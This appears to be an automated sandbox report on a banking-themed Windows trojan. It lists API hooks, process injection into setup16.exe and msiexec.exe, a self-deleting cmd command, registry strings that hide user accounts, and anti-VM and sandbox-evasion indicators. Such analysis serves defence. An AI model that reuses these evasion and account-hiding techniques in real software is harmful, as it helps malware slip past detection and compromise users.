          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09670 NtQueryInformationProcess,6_2_04A09670
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09650 NtQueryValueKey,6_2_04A09650
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09730 NtQueryVirtualMemory,6_2_04A09730
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A0A710 NtOpenProcessToken,6_2_04A0A710
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09760 NtOpenProcess,6_2_04A09760
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09770 NtSetInformationFile,6_2_04A09770
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A0A770 NtOpenThread,6_2_04A0A770
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A098A0 NtWriteVirtualMemory,6_2_04A098A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09820 NtEnumerateKey,6_2_04A09820
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A0B040 NtSuspendThread,6_2_04A0B040
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A099D0 NtCreateProcessEx,6_2_04A099D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09950 NtQueueApcThread,6_2_04A09950
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09A80 NtOpenDirectoryObject,6_2_04A09A80
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09A10 NtQuerySection,6_2_04A09A10
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A0A3B0 NtGetContextThread,6_2_04A0A3B0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09B00 NtSetValueKey,6_2_04A09B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC95D0 NtClose,LdrInitializeThunk,15_2_04DC95D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9540 NtReadFile,LdrInitializeThunk,15_2_04DC9540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC96D0 NtCreateKey,LdrInitializeThunk,15_2_04DC96D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_04DC96E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9FE0 NtCreateMutant,LdrInitializeThunk,15_2_04DC9FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9780 NtMapViewOfSection,LdrInitializeThunk,15_2_04DC9780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9710 NtQueryInformationToken,LdrInitializeThunk,15_2_04DC9710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9840 NtDelayExecution,LdrInitializeThunk,15_2_04DC9840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_04DC9860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC99A0 NtCreateSection,LdrInitializeThunk,15_2_04DC99A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_04DC9910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9A50 NtCreateFile,LdrInitializeThunk,15_2_04DC9A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC95F0 NtQueryInformationFile,15_2_04DC95F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9560 NtWriteFile,15_2_04DC9560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DCAD30 NtSetContextThread,15_2_04DCAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9520 NtWaitForSingleObject,15_2_04DC9520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9650 NtQueryValueKey,15_2_04DC9650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9670 NtQueryInformationProcess,15_2_04DC9670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9660 NtAllocateVirtualMemory,15_2_04DC9660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9610 NtEnumerateValueKey,15_2_04DC9610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC97A0 NtUnmapViewOfSection,15_2_04DC97A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DCA770 NtOpenThread,15_2_04DCA770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9770 NtSetInformationFile,15_2_04DC9770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9760 NtOpenProcess,15_2_04DC9760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DCA710 NtOpenProcessToken,15_2_04DCA710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9730 NtQueryVirtualMemory,15_2_04DC9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC98F0 NtReadVirtualMemory,15_2_04DC98F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC98A0 NtWriteVirtualMemory,15_2_04DC98A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DCB040 NtSuspendThread,15_2_04DCB040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9820 NtEnumerateKey,15_2_04DC9820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC99D0 NtCreateProcessEx,15_2_04DC99D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9950 NtQueueApcThread,15_2_04DC9950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9A80 NtOpenDirectoryObject,15_2_04DC9A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9A10 NtQuerySection,15_2_04DC9A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9A00 NtProtectVirtualMemory,15_2_04DC9A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9A20 NtResumeThread,15_2_04DC9A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DCA3B0 NtGetContextThread,15_2_04DCA3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC9B00 NtSetValueKey,15_2_04DC9B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8A3C0 NtReadFile,15_2_00E8A3C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8A310 NtCreateFile,15_2_00E8A310
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8A440 NtClose,15_2_00E8A440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8A3BB NtCreateFile,15_2_00E8A3BB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8A30A NtCreateFile,15_2_00E8A30A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8A43A NtClose,15_2_00E8A43A
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.316297470.000000000463B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.269440219.000000000050A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMicrosoft.Identity.Client.dllb! vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315868212.00000000045E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.314396844.0000000003C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.314396844.0000000003C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.309996222.0000000002C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUP.EXEj% vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.309969351.0000000002C35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315384687.000000000458F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.316648903.0000000004691000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKXTy QGR.exe2 vs Document de bancobpi_66473474.exe
          Source: C:\Windows\SysWOW64\setup16.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: Document de bancobpi_66473474.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Document de bancobpi_66473474.exe "C:\Users\user\Desktop\Document de bancobpi_66473474.exe"
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess created: C:\Windows\SysWOW64\setup16.exe C:\Windows\SysWOW64\setup16.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\setup16.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess created: C:\Windows\SysWOW64\setup16.exe C:\Windows\SysWOW64\setup16.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\setup16.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Document de bancobpi_66473474.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@7/1@16/5
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_01
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://www.w3.org/2005/08/addressing
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://www.w3.org/2005/08/addressing/anonymous
          Source: Document de bancobpi_66473474.exeString found in binary or memory: P/RyHo85CIG2zSYZIVAcS3t9th6Dqnd0C2zI6Cg9/AddfpD/nHOE7I+dh8H8gV6+JtW7yxfy3WVgq3nGEMqfJZAnQnsi4rRC67/zSMdX6duNXY2CZ/5dbIMi0r3tkUBJEGcrcIwQjRNIDF/v0n9beooRisbw7m5nXNuZ9qwJ6pYkeNVKkZVlDdKOws48rW+cMyrWlWvBhY2QTjeSiMg6ucdD2qcmQ9CQ7txhZQ7cUNS/nIYEjicQuge02P32Q8SU0kSH
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Document de bancobpi_66473474.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Document de bancobpi_66473474.exeStatic file information: File size 3044864 > 1048576
          Source: Document de bancobpi_66473474.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Document de bancobpi_66473474.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2e6800
          Source: Document de bancobpi_66473474.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Document de bancobpi_66473474.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: setup16.exe, 00000006.00000002.370046812.0000000000C40000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: D:\a\1\s\src\Microsoft.Identity.Client\obj\Release\net45\Microsoft.Identity.Client.pdb source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000002.308101856.0000000000508000.00000020.00000001.01000000.00000003.sdmp
          Source: Binary string: msiexec.pdbGCTL source: setup16.exe, 00000006.00000002.370046812.0000000000C40000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: setup16.pdb source: msiexec.exe, 0000000F.00000002.540850727.0000000005297000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539144057.000000000332B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: setup16.exe, 00000006.00000003.306175651.0000000004807000.00000004.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000002.371081823.0000000004ABF000.00000040.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000003.301318253.000000000460C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.371291464.0000000004BBF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.369829774.0000000004A1C000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: setup16.pdbGCTL source: Document de bancobpi_66473474.exe, 00000000.00000002.309996222.0000000002C52000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540850727.0000000005297000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539144057.000000000332B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: setup16.exe, setup16.exe, 00000006.00000003.306175651.0000000004807000.00000004.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000002.371081823.0000000004ABF000.00000040.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000003.301318253.000000000460C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.371291464.0000000004BBF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.369829774.0000000004A1C000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: D:\a\1\s\src\Microsoft.Identity.Client\obj\Release\net45\Microsoft.Identity.Client.pdbSHA256R source: Document de bancobpi_66473474.exe, 00000000.00000002.308101856.0000000000508000.00000020.00000001.01000000.00000003.sdmp
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeCode function: 0_2_011D07A0 pushad ; iretd 0_2_011D07A9
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeCode function: 0_2_011DCC3A push eax; retf 0_2_011DCC41
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeCode function: 0_2_011DFF3B push esi; iretd 0_2_011DFF3E
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_00417151 pushfd ; ret 6_2_00417152
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_00404BFC push ebx; iretd 6_2_00404BFD
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041EC03 push es; ret 6_2_0041EC05
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041D662 push eax; ret 6_2_0041D668
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041D66B push eax; ret 6_2_0041D6D2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041D615 push eax; ret 6_2_0041D668
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041D6CC push eax; ret 6_2_0041D6D2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A1D0D1 push ecx; ret 6_2_04A1D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DDD0D1 push ecx; ret 15_2_04DDD0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E87151 pushfd ; ret 15_2_00E87152
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E74BFC push ebx; iretd 15_2_00E74BFD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8EC03 push es; ret 15_2_00E8EC05
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8D6CC push eax; ret 15_2_00E8D6D2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8D66B push eax; ret 15_2_00E8D6D2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8D662 push eax; ret 15_2_00E8D668
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8D615 push eax; ret 15_2_00E8D668
          Source: Document de bancobpi_66473474.exeStatic PE information: 0x8CD51163 [Mon Nov 14 22:04:19 2044 UTC]

          Hooking and other Techniques for Hiding and Protection

          barindex
          Contains functionality to hide user accounts
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Document de bancobpi_66473474.exe PID: 6960, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.309260291.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\setup16.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\setup16.exeRDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exe TID: 7004Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7036Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6096Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_00408ED0 rdtsc 6_2_00408ED0
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\setup16.exeAPI coverage: 8.8 %
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.6 %
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000A.00000000.335965397.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000A.00000000.320991838.0000000008370000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000A.00000000.352811923.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.349847105.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
          Source: Document de bancobpi_66473474.exeBinary or memory string: lT8YhkBK4nDFlhB5Ledilbv2F+tW+sKkvkendzo7/IWdnP7c//DD77sVbR4ErTIv+P3AuVg2fsdIDR9xattstVh3CGkKggKjuyqMvpVqUM8zbBbQZ6bnqwE8dVKviAfM+Z5OwbofGCobbE3BlR+N05aEh8DYIZAoM41Uz4YdBqYBif9S10CD/g0mp6csalP4JeNMOxOOr7SG1KqPKdVU/+iU++T0MW8iJ3ljhntFtttUUZK+sZaHgFSZpZd1WFkmD8b/
          Source: explorer.exe, 0000000A.00000000.320440616.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
